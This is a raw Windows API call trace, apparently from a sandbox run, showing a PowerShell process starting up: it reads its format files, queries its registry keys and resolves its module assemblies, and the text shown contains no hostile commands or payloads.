	[0402.397] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xde7758d4, Data2=0x433, Data3=0x42da, Data4=([0]=0xaa, [1]=0x2d, [2]=0x71, [3]=0xfd, [4]=0x74, [5]=0x45, [6]=0x80, [7]=0x20))) returned 0x0
	[0402.397] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x9263c0ab, Data2=0x9078, Data3=0x449b, Data4=([0]=0xb6, [1]=0x11, [2]=0x7, [3]=0x6b, [4]=0xc1, [5]=0x70, [6]=0x2e, [7]=0xa2))) returned 0x0
	[0402.397] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xe30d9bfd, Data2=0xa3f1, Data3=0x4251, Data4=([0]=0xb9, [1]=0x90, [2]=0x4c, [3]=0xc1, [4]=0x7c, [5]=0x27, [6]=0xd1, [7]=0xdc))) returned 0x0
	[0402.397] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x97477bc6, Data2=0x264f, Data3=0x49c9, Data4=([0]=0x85, [1]=0xe, [2]=0x3f, [3]=0xd0, [4]=0x5, [5]=0xeb, [6]=0xa9, [7]=0x52))) returned 0x0
	[0402.397] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xd518ab92, Data2=0xf5f0, Data3=0x4c70, Data4=([0]=0x95, [1]=0x2d, [2]=0x95, [3]=0x43, [4]=0xf3, [5]=0x2c, [6]=0x16, [7]=0x87))) returned 0x0
	[0402.397] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.397] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x53909a9d, Data2=0x153b, Data3=0x4fbd, Data4=([0]=0xa3, [1]=0x2f, [2]=0x19, [3]=0x36, [4]=0xcc, [5]=0x9b, [6]=0xd6, [7]=0xb0))) returned 0x0
	[0402.398] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x7ba9d4f4, Data2=0x981f, Data3=0x4ea4, Data4=([0]=0xa3, [1]=0x8e, [2]=0x98, [3]=0xec, [4]=0x15, [5]=0xdd, [6]=0x3a, [7]=0x54))) returned 0x0
	[0402.398] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x8a320b47, Data2=0x6886, Data3=0x4983, Data4=([0]=0x97, [1]=0xfd, [2]=0xdb, [3]=0xc1, [4]=0x52, [5]=0x44, [6]=0xc0, [7]=0x22))) returned 0x0
	[0402.398] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xa5acb771, Data2=0x7e9, Data3=0x4e27, Data4=([0]=0x90, [1]=0x17, [2]=0x5a, [3]=0x50, [4]=0xed, [5]=0x5b, [6]=0xc1, [7]=0x47))) returned 0x0
	[0402.398] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x345ab8f, Data2=0x29ab, Data3=0x4439, Data4=([0]=0x96, [1]=0x75, [2]=0x66, [3]=0x16, [4]=0x3f, [5]=0x65, [6]=0x1c, [7]=0x90))) returned 0x0
	[0402.398] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.398] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xdb405318, Data2=0x7bf8, Data3=0x4486, Data4=([0]=0xad, [1]=0x21, [2]=0xc6, [3]=0x20, [4]=0xc7, [5]=0x5c, [6]=0x78, [7]=0x52))) returned 0x0
	[0402.398] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xecec5c27, Data2=0xac1c, Data3=0x4eaf, Data4=([0]=0xa1, [1]=0xf5, [2]=0xec, [3]=0x63, [4]=0xaf, [5]=0x9, [6]=0x2a, [7]=0xd5))) returned 0x0
	[0402.399] VirtualQuery (in: lpAddress=0x26bd90, lpBuffer=0x26cc50, dwLength=0x30 | out: lpBuffer=0x26cc50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.399] VirtualQuery (in: lpAddress=0x26bd90, lpBuffer=0x26cc50, dwLength=0x30 | out: lpBuffer=0x26cc50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.399] VirtualQuery (in: lpAddress=0x26bd90, lpBuffer=0x26cc50, dwLength=0x30 | out: lpBuffer=0x26cc50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.399] VirtualQuery (in: lpAddress=0x26bd90, lpBuffer=0x26cc50, dwLength=0x30 | out: lpBuffer=0x26cc50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0402.399] SetErrorMode (uMode=0x1) returned 0x1
	[0402.399] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0402.400] GetFileType (hFile=0x300) returned 0x1
	[0402.400] SetErrorMode (uMode=0x1) returned 0x1
	[0402.400] GetFileType (hFile=0x300) returned 0x1
	[0402.400] ReadFile (in: hFile=0x300, lpBuffer=0x338e108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x338e108*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.400] ReadFile (in: hFile=0x300, lpBuffer=0x338e108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x338e108*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.400] ReadFile (in: hFile=0x300, lpBuffer=0x338e108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x338e108*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.401] ReadFile (in: hFile=0x300, lpBuffer=0x338e108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x338e108*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.401] ReadFile (in: hFile=0x300, lpBuffer=0x338e108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x338e108*, lpNumberOfBytesRead=0x26d0b8*=0x8b4, lpOverlapped=0x0) returned 1
	[0402.401] ReadFile (in: hFile=0x300, lpBuffer=0x338d524, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x338d524*, lpNumberOfBytesRead=0x26d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0402.401] ReadFile (in: hFile=0x300, lpBuffer=0x338e108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x338e108*, lpNumberOfBytesRead=0x26d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0402.401] CloseHandle (hObject=0x300) returned 1
	[0402.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0402.401] SetErrorMode (uMode=0x1) returned 0x1
	[0402.402] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d060 | out: lpFileInformation=0x26d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0402.402] SetErrorMode (uMode=0x1) returned 0x1
	[0402.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0402.402] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d148 | out: phkResult=0x26d148*=0x300) returned 0x0
	[0402.402] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d0cc, lpData=0x0, lpcbData=0x26d0c8*=0x0 | out: lpType=0x26d0cc*=0x1, lpData=0x0, lpcbData=0x26d0c8*=0x56) returned 0x0
	[0402.402] CoTaskMemAlloc (cb=0x5a) returned 0x47ed70
	[0402.402] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d09c, lpData=0x47ed70, lpcbData=0x26d098*=0x56 | out: lpType=0x26d09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d098*=0x56) returned 0x0
	[0402.402] CoTaskMemFree (pv=0x47ed70) 
	[0402.402] RegCloseKey (hKey=0x300) returned 0x0
	[0402.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0402.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0402.403] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x82d792e7, Data2=0x47b3, Data3=0x4bcc, Data4=([0]=0x81, [1]=0x99, [2]=0xc, [3]=0x1, [4]=0xbf, [5]=0xdb, [6]=0x76, [7]=0xa5))) returned 0x0
	[0402.403] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x6f673100, Data2=0x3840, Data3=0x4623, Data4=([0]=0xbf, [1]=0xc9, [2]=0xdf, [3]=0xe9, [4]=0x78, [5]=0x4e, [6]=0xbb, [7]=0xe5))) returned 0x0
	[0402.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0402.403] SetErrorMode (uMode=0x1) returned 0x1
	[0402.403] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0402.404] GetFileType (hFile=0x300) returned 0x1
	[0402.404] SetErrorMode (uMode=0x1) returned 0x1
	[0402.404] GetFileType (hFile=0x300) returned 0x1
	[0402.404] ReadFile (in: hFile=0x300, lpBuffer=0x33cbef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x33cbef0*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.404] ReadFile (in: hFile=0x300, lpBuffer=0x33cbef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x33cbef0*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.404] ReadFile (in: hFile=0x300, lpBuffer=0x33cbef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x33cbef0*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.404] ReadFile (in: hFile=0x300, lpBuffer=0x33cbef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x33cbef0*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0402.405] ReadFile (in: hFile=0x300, lpBuffer=0x33cbef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x33cbef0*, lpNumberOfBytesRead=0x26d0b8*=0xe98, lpOverlapped=0x0) returned 1
	[0402.405] ReadFile (in: hFile=0x300, lpBuffer=0x33cb4f0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x33cb4f0*, lpNumberOfBytesRead=0x26d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0402.405] ReadFile (in: hFile=0x300, lpBuffer=0x33cbef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x33cbef0*, lpNumberOfBytesRead=0x26d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0402.405] CloseHandle (hObject=0x300) returned 1
	[0402.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0402.405] SetErrorMode (uMode=0x1) returned 0x1
	[0402.405] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d060 | out: lpFileInformation=0x26d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0402.405] SetErrorMode (uMode=0x1) returned 0x1
	[0402.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0402.406] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d148 | out: phkResult=0x26d148*=0x300) returned 0x0
	[0402.406] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d0cc, lpData=0x0, lpcbData=0x26d0c8*=0x0 | out: lpType=0x26d0cc*=0x1, lpData=0x0, lpcbData=0x26d0c8*=0x56) returned 0x0
	[0402.406] CoTaskMemAlloc (cb=0x5a) returned 0x47ed70
	[0402.406] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d09c, lpData=0x47ed70, lpcbData=0x26d098*=0x56 | out: lpType=0x26d09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d098*=0x56) returned 0x0
	[0402.406] CoTaskMemFree (pv=0x47ed70) 
	[0402.406] RegCloseKey (hKey=0x300) returned 0x0
	[0402.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0402.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0402.407] VirtualQuery (in: lpAddress=0x26bbe0, lpBuffer=0x26caa0, dwLength=0x30 | out: lpBuffer=0x26caa0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.407] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xbf47ca0c, Data2=0x9368, Data3=0x4ce1, Data4=([0]=0xb2, [1]=0xf6, [2]=0xe5, [3]=0x13, [4]=0xb1, [5]=0x87, [6]=0x1e, [7]=0x7e))) returned 0x0
	[0402.407] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x96cd37c8, Data2=0x8152, Data3=0x405b, Data4=([0]=0xa9, [1]=0xd3, [2]=0x58, [3]=0x62, [4]=0x9d, [5]=0x2d, [6]=0xab, [7]=0x57))) returned 0x0
	[0402.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0402.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0402.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0402.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0402.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0402.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0402.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0402.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0402.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0402.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0402.874] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0402.874] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.874] CoTaskMemFree (pv=0x46a9e0) 
	[0402.875] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0402.875] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.875] CoTaskMemFree (pv=0x46a9e0) 
	[0402.876] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0402.876] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.876] CoTaskMemFree (pv=0x46a9e0) 
	[0402.877] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0402.877] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.877] CoTaskMemFree (pv=0x46a9e0) 
	[0402.886] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0402.886] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.886] CoTaskMemFree (pv=0x46a9e0) 
	[0402.887] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0402.887] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.887] CoTaskMemFree (pv=0x46a9e0) 
	[0402.887] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0402.887] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.887] CoTaskMemFree (pv=0x46a9e0) 
	[0403.352] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d358 | out: phkResult=0x26d358*=0x300) returned 0x0
